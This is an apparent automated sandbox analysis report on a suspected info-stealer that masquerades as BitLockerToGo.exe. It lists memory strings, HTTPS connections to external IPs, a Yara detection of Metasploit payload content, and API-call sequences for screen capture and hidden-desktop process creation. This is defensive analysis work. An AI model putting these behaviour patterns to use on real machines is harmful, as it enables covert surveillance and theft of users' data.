                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161893325.00002FC000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158560002.00002FC002C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US._3uvDuX1Bhg.2019.O/rt=j/m=q_dnp
                          Source: chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.iheart.com/podcast/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.instagram.com
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.last.fm/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.messenger.com
                          Source: IEHIII.3.drString found in binary or memory: https://www.mozilla.org
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                          Source: IEHIII.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/KJKEBFIEHD
                          Source: IEHIII.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                          Source: IEHIII.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                          Source: BitLockerToGo.exe, 00000003.00000003.2573582929.000000001B915000.00000004.00000020.00020000.00000000.sdmp, IEHIII.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.office.com
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://y.music.163.com/m/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49711 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.13.32.95:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.53.18:443 -> 192.168.2.8:49752 version: TLS 1.2
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F3BB1 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_008F3BB1
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E8DEA _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcat,lstrcat,lstrcat,_memset,lstrcpy,_memset,CreateProcessA,Sleep,CloseDesktop,3_2_008E8DEA

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                          Source: 00000000.00000003.1596858257.0000000011A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E144B GetCurrentProcess,NtQueryInformationProcess,3_2_008E144B
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9DB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C9DB700
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9DB8C0 rand_s,NtQueryVirtualMemory,3_2_6C9DB8C0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9DB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,3_2_6C9DB910
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C97F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C97F280
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E7FAB3_2_008E7FAB
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0090F1B33_2_0090F1B3
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0090EA433_2_0090EA43
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FACEC3_2_008FACEC
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FDC543_2_008FDC54
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0090F59B3_2_0090F59B
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0090E5AE3_2_0090E5AE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0090EDE13_2_0090EDE1
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FCEF43_2_008FCEF4
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9735A03_2_6C9735A0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C986C803_2_6C986C80
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9D34A03_2_6C9D34A0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9DC4A03_2_6C9DC4A0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C99D4D03_2_6C99D4D0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9864C03_2_6C9864C0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B6CF03_2_6C9B6CF0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C97D4E03_2_6C97D4E0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B5C103_2_6C9B5C10
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9C2C103_2_6C9C2C10
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9EAC003_2_6C9EAC00
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9E542B3_2_6C9E542B
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9E545C3_2_6C9E545C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9854403_2_6C985440
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B0DD03_2_6C9B0DD0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9D85F03_2_6C9D85F0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9A05123_2_6C9A0512
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C99ED103_2_6C99ED10
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C98FD003_2_6C98FD00
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C995E903_2_6C995E90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9DE6803_2_6C9DE680
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9D4EA03_2_6C9D4EA0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C97BEF03_2_6C97BEF0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C98FEF03_2_6C98FEF0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9E76E33_2_6C9E76E3
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B7E103_2_6C9B7E10
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9C56003_2_6C9C5600
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9D9E303_2_6C9D9E30
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C999E503_2_6C999E50
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B3E503_2_6C9B3E50
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9C2E4E3_2_6C9C2E4E
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9946403_2_6C994640
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C97C6703_2_6C97C670
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9E6E633_2_6C9E6E63
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9C77A03_2_6C9C77A0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9A6FF03_2_6C9A6FF0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C97DFE03_2_6C97DFE0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B77103_2_6C9B7710
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C989F003_2_6C989F00
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9A60A03_2_6C9A60A0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9E50C73_2_6C9E50C7
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C99C0E03_2_6C99C0E0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B58E03_2_6C9B58E0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9878103_2_6C987810
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9BB8203_2_6C9BB820
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9C48203_2_6C9C4820
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9988503_2_6C998850
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C99D8503_2_6C99D850
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9BF0703_2_6C9BF070
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9B51903_2_6C9B5190
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9D29903_2_6C9D2990
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9AD9B03_2_6C9AD9B0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C97C9A03_2_6C97C9A0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C99A9403_2_6C99A940
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9CB9703_2_6C9CB970
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9EB1703_2_6C9EB170
